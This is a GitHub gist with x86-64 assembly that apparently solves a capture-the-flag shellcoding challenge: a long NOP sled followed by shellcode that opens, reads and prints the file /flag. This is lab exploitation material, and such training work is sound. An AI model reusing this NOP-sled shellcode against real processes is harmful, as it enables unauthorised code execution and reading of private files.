Last active
May 1, 2025 19:40
-
-
Save morkev/c00b2fdeb8d2b468b1c21c9d25ea00ba to your computer and use it in GitHub Desktop.
Write and execute shellcode to read the flag. A portion of the input is randomly skipped.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 64 | |
| section .text | |
| global _start | |
| _start: | |
| nop_sled: | |
| times 0x800 nop | |
| shellcode_start: | |
| ; Prepare the '/flag' string | |
| xor rax, rax ; Clear rax | |
| push rax ; Null terminator for the string | |
| mov rbx, 0x67616c662f ; '/flag' in hex reversed | |
| push rbx ; Push '/flag' onto the stack | |
| mov rdi, rsp ; rdi points to '/flag' | |
| xor rsi, rsi ; rsi = 0 (O_RDONLY) | |
| xor rdx, rdx ; rdx = 0 (mode, not used) | |
| mov rax, 2 ; syscall number for open | |
| syscall ; open('/flag', O_RDONLY) | |
| ; The file descriptor is in rax | |
| mov rdi, rax ; rdi = file descriptor | |
| mov rsi, rsp ; rsi = buffer (reuse stack) | |
| mov rdx, 0x100 ; rdx = number of bytes to read (256) | |
| xor rax, rax ; syscall number for read is 0 | |
| syscall ; read(fd, buf, 256) | |
| ; Write to stdout | |
| mov rdi, 1 ; stdout file descriptor | |
| mov rdx, rax ; rdx = number of bytes read | |
| mov rax, 1 ; syscall number for write | |
| syscall ; write(1, buf, nbytes) | |
| ; Exit | |
| xor rdi, rdi ; rdi = 0 (exit status) | |
| mov rax, 60 ; syscall number for exit | |
| syscall ; exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment